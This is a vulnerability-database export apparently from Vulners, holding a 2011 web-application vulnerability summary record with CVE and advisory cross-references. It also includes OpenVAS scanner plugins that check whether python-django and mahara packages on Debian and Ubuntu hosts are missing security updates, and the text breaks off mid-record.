{"id": "SECURITYVULNS:VULN:12022", "bulletinFamily": "software", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "published": "2011-11-06T00:00:00", "modified": "2011-11-06T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12022", "reporter": " ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:27281", "https://vulners.com/securityvulns/securityvulns:doc:27266", "https://vulners.com/securityvulns/securityvulns:doc:27278", "https://vulners.com/securityvulns/securityvulns:doc:27276", "https://vulners.com/securityvulns/securityvulns:doc:27267", "https://vulners.com/securityvulns/securityvulns:doc:27270", "https://vulners.com/securityvulns/securityvulns:doc:27268", "https://vulners.com/securityvulns/securityvulns:doc:27272", "https://vulners.com/securityvulns/securityvulns:doc:27274", "https://vulners.com/securityvulns/securityvulns:doc:27273", "https://vulners.com/securityvulns/securityvulns:doc:27265", "https://vulners.com/securityvulns/securityvulns:doc:27271", "https://vulners.com/securityvulns/securityvulns:doc:27264", "https://vulners.com/securityvulns/securityvulns:doc:27269", "https://vulners.com/securityvulns/securityvulns:doc:27277", "https://vulners.com/securityvulns/securityvulns:doc:27275", "https://vulners.com/securityvulns/securityvulns:doc:27263"], "cvelist": ["CVE-2011-4136", "CVE-2011-1359", "CVE-2011-4074", "CVE-2011-4137", "CVE-2011-2773", "CVE-2011-4140", "CVE-2011-2772", "CVE-2011-4138", "CVE-2011-4075", "CVE-2011-2688", "CVE-2011-2771", "CVE-2011-4139"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:44", "edition": 1, "viewCount": 54, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2018-08-31T11:09:44", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:70548", "OPENVAS:863956", "OPENVAS:1361412562310863642", "OPENVAS:1361412562310863637", "OPENVAS:136141256231070550", "OPENVAS:136141256231070548", "OPENVAS:831481", "OPENVAS:70550", "OPENVAS:1361412562310840830", "OPENVAS:840830"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2279.NASL", "FEDORA_2011-14924.NASL", "DEBIAN_DSA-2333.NASL", "GENTOO_GLSA-201110-23.NASL", "OPENSUSE-2012-294.NASL", "UBUNTU_USN-1297-1.NASL", "DEBIAN_DSA-2332.NASL", "FEDORA_2011-14993.NASL", "FEDORA_2011-14986.NASL", "DEBIAN_DSA-2334.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2279-1:127D6", "DEBIAN:BSA-042:A3B69", "DEBIAN:DSA-2333-1:270B2", "DEBIAN:DSA-2334-1:F6AD0", "DEBIAN:DSA-2332-1:3B784"]}, {"type": "ubuntu", "idList": ["USN-1297-1"]}, {"type": "cve", "idList": ["CVE-2011-4140", "CVE-2011-4138", "CVE-2011-2772", "CVE-2011-4137", "CVE-2011-4074", "CVE-2011-1359", "CVE-2011-4136", "CVE-2011-4139", "CVE-2011-4075", "CVE-2011-2688"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27270", "SECURITYVULNS:DOC:26677", "SECURITYVULNS:DOC:27275", "SECURITYVULNS:DOC:27277", "SECURITYVULNS:DOC:27264", "SECURITYVULNS:VULN:11801", "SECURITYVULNS:DOC:27269", "SECURITYVULNS:DOC:27266", "SECURITYVULNS:DOC:27272", "SECURITYVULNS:DOC:27265", "SECURITYVULNS:DOC:27268", "SECURITYVULNS:DOC:27263", "SECURITYVULNS:DOC:27278", "SECURITYVULNS:DOC:27271", "SECURITYVULNS:DOC:27273", "SECURITYVULNS:DOC:27276", "SECURITYVULNS:DOC:27274", "SECURITYVULNS:DOC:27267", "SECURITYVULNS:DOC:27281"]}, {"type": "exploitdb", "idList": ["EDB-ID:18031", "EDB-ID:18021"]}, {"type": "fedora", "idList": ["FEDORA:25B06216FB", "FEDORA:6627020EBD", "FEDORA:559EA20CFA"]}, {"type": "github", "idList": ["GHSA-H95J-H2RV-QRG4", "GHSA-3JQW-CRQJ-W8QW", "GHSA-X88J-93VC-WPMP"]}, {"type": "gentoo", "idList": ["GLSA-201110-23"]}, {"type": "dsquare", "idList": ["E-25"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/PHPLDAPADMIN_QUERY_ENGINE"]}], "modified": "2018-08-31T11:09:44", "rev": 2}, "vulnersScore": 5.0}, "affectedSoftware": [{"name": "spip", "operator": "eq", "version": "2.1"}, {"name": "WordPress", "operator": "eq", "version": "3.2"}, {"name": "simplesamlphp", "operator": "eq", "version": "1.8"}, {"name": "phpLDAPadmin", "operator": "eq", "version": "1.2"}, {"name": "WebSphere", "operator": "eq", "version": "7.0"}, {"name": "OneOrZero AIMS", "operator": "eq", "version": "2.7"}, {"name": "Efront", "operator": "eq", "version": "3.6"}, {"name": "WebSphere", "operator": "eq", "version": "8.0"}, {"name": "Jara", "operator": "eq", "version": "1.6"}, {"name": "Serendipity", "operator": "eq", "version": "1.5"}, {"name": "WebSphere", "operator": "eq", "version": "6.1"}, {"name": "mahara", "operator": "eq", "version": "1.4"}, {"name": "mod_authnz_external", "operator": "eq", "version": "3.2"}, {"name": "Symphony CMS", "operator": "eq", "version": "2.2"}, {"name": "WordPress", "operator": "eq", "version": "2.1"}]}

{"openvas": [{"lastseen": "2017-07-24T12:50:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4140", "CVE-2011-4138", "CVE-2011-4139"], "description": "The remote host is missing an update to python-django\nannounced via advisory DSA 2332-1.", "modified": "2017-07-07T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:70548", "href": "http://plugins.openvas.org/nasl.php?oid=70548", "type": "openvas", "title": "Debian Security Advisory DSA 2332-1 (python-django)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2332_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2332-1 (python-django)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework:\n\nCVE-2011-4136\n\nWhen using memory-based sessions and caching, Django sessions are\nstored directly in the root namespace of the cache. When user data is\nstored in the same cache, a remote user may take over a session.\n\nCVE-2011-4137, CVE-2011-4138\n\nDjango's field type URLfield by default checks supplied URL's by\nissuing a request to it, which doesn't time out. A Denial of Service\nis possible by supplying specially prepared URL's that keep the\nconnection open indefinitely or fill the Django's server memory.\n\nCVE-2011-4139\n\nDjango used X-Forwarded-Host headers to construct full URL's. This\nheader may not contain trusted input and could be used to poison the\ncache.\n\nCVE-2011-4140\n\nThe CSRF protection mechanism in Django does not properly handle\nweb-server configurations supporting arbitrary HTTP Host headers,\nwhich allows remote attackers to trigger unauthenticated forged\nrequests.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\n\nFor the testing (wheezy) and unstable distribution (sid), this problem\nhas been fixed in version 1.3.1-1.\n\nWe recommend that you upgrade your python-django packages.\";\ntag_summary = \"The remote host is missing an update to python-django\nannounced via advisory DSA 2332-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202332-1\";\n\nif(description)\n{\n script_id(70548);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\", \"CVE-2011-4140\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:22 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2332-1 (python-django)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.0.2-1+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.3-3+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-django-doc\", ver:\"1.2.3-3+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4140", "CVE-2011-4138", "CVE-2011-4139"], "description": "The remote host is missing an update to python-django\nannounced via advisory DSA 2332-1.", "modified": "2019-03-18T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:136141256231070548", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070548", "type": "openvas", "title": "Debian Security Advisory DSA 2332-1 (python-django)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2332_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2332-1 (python-django)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70548\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\", \"CVE-2011-4140\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:22 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2332-1 (python-django)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202332-1\");\n script_tag(name:\"insight\", value:\"Paul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework:\n\nCVE-2011-4136\n\nWhen using memory-based sessions and caching, Django sessions are\nstored directly in the root namespace of the cache. When user data is\nstored in the same cache, a remote user may take over a session.\n\nCVE-2011-4137, CVE-2011-4138\n\nDjango's field type URLfield by default checks supplied URL's by\nissuing a request to it, which doesn't time out. A Denial of Service\nis possible by supplying specially prepared URL's that keep the\nconnection open indefinitely or fill the Django's server memory.\n\nCVE-2011-4139\n\nDjango used X-Forwarded-Host headers to construct full URL's. This\nheader may not contain trusted input and could be used to poison the\ncache.\n\nCVE-2011-4140\n\nThe CSRF protection mechanism in Django does not properly handle\nweb-server configurations supporting arbitrary HTTP Host headers,\nwhich allows remote attackers to trigger unauthenticated forged\nrequests.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\n\nFor the testing (wheezy) and unstable distribution (sid), this problem\nhas been fixed in version 1.3.1-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your python-django packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to python-django\nannounced via advisory DSA 2332-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.0.2-1+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.3-3+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-django-doc\", ver:\"1.2.3-3+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-04T11:26:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1297-1", "modified": "2017-12-01T00:00:00", "published": "2011-12-09T00:00:00", "id": "OPENVAS:840830", "href": "http://plugins.openvas.org/nasl.php?oid=840830", "type": "openvas", "title": "Ubuntu Update for python-django USN-1297-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1297_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for python-django USN-1297-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pall McMillan discovered that Django used the root namespace when storing\n cached session data. A remote attacker could exploit this to modify\n sessions. (CVE-2011-4136)\n\n Paul McMillan discovered that Django would not timeout on arbitrary URLs\n when the application used URLFields. This could be exploited by a remote\n attacker to cause a denial of service via resource exhaustion.\n (CVE-2011-4137)\n\n Paul McMillan discovered that while Django would check the validity of a\n URL via a HEAD request, it would instead use a GET request for the target\n of a redirect. This could potentially be used to trigger arbitrary GET\n requests via a crafted Location header. (CVE-2011-4138)\n\n It was discovered that Django would sometimes use a request's HTTP Host\n header to construct a full URL. A remote attacker could exploit this to\n conduct host header cache poisoning attacks via a crafted request.\n (CVE-2011-4139)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1297-1\";\ntag_affected = \"python-django on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1297-1/\");\n script_id(840830);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-09 10:52:57 +0530 (Fri, 09 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"USN\", value: \"1297-1\");\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\");\n script_name(\"Ubuntu Update for python-django USN-1297-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.3-1ubuntu0.2.10.10.3\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.1.1-2ubuntu1.4\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.5-1ubuntu1.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1297-1", "modified": "2019-03-13T00:00:00", "published": "2011-12-09T00:00:00", "id": "OPENVAS:1361412562310840830", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840830", "type": "openvas", "title": "Ubuntu Update for python-django USN-1297-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1297_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for python-django USN-1297-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1297-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840830\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-09 10:52:57 +0530 (Fri, 09 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name:\"USN\", value:\"1297-1\");\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\");\n script_name(\"Ubuntu Update for python-django USN-1297-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.10|10\\.04 LTS|11\\.04)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1297-1\");\n script_tag(name:\"affected\", value:\"python-django on Ubuntu 11.04,\n Ubuntu 10.10,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Pall McMillan discovered that Django used the root namespace when storing\n cached session data. A remote attacker could exploit this to modify\n sessions. (CVE-2011-4136)\n\n Paul McMillan discovered that Django would not timeout on arbitrary URLs\n when the application used URLFields. This could be exploited by a remote\n attacker to cause a denial of service via resource exhaustion.\n (CVE-2011-4137)\n\n Paul McMillan discovered that while Django would check the validity of a\n URL via a HEAD request, it would instead use a GET request for the target\n of a redirect. This could potentially be used to trigger arbitrary GET\n requests via a crafted Location header. (CVE-2011-4138)\n\n It was discovered that Django would sometimes use a request's HTTP Host\n header to construct a full URL. A remote attacker could exploit this to\n conduct host header cache poisoning attacks via a crafted request.\n (CVE-2011-4139)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.3-1ubuntu0.2.10.10.3\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.1.1-2ubuntu1.4\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.5-1ubuntu1.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2017-07-24T12:51:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2773", "CVE-2011-2772", "CVE-2011-2771"], "description": "The remote host is missing an update to mahara\nannounced via advisory DSA 2334-1.", "modified": "2017-07-07T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:70550", "href": "http://plugins.openvas.org/nasl.php?oid=70550", "type": "openvas", "title": "Debian Security Advisory DSA 2334-1 (mahara)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2334_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2334-1 (mahara)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities were discovered in Mahara, an electronic\nportfolio, weblog, and resume builder:\n\nCVE-2011-2771\n\nTeemu Vesala discovered that missing input sanitising of RSS\nfeeds could lead to cross-site scripting.\n\nCVE-2011-2772\n\nRichard Mansfield discovered that insufficient upload restrictions\nallowed denial of service.\n\nCVE-2011-2773\n\nRichard Mansfield that the management of institutions was prone to\ncross-site request forgery.\n\n(no CVE ID available yet)\n\nAndrew Nichols discovered a privilege escalation vulnerability\nin MNet handling.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.1-1.\n\nWe recommend that you upgrade your mahara packages.\";\ntag_summary = \"The remote host is missing an update to mahara\nannounced via advisory DSA 2334-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202334-1\";\n\nif(description)\n{\n script_id(70550);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2771\", \"CVE-2011-2772\", \"CVE-2011-2773\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:34 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2334-1 (mahara)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.0.4-4+lenny11\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.0.4-4+lenny11\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-mediaplayer\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": 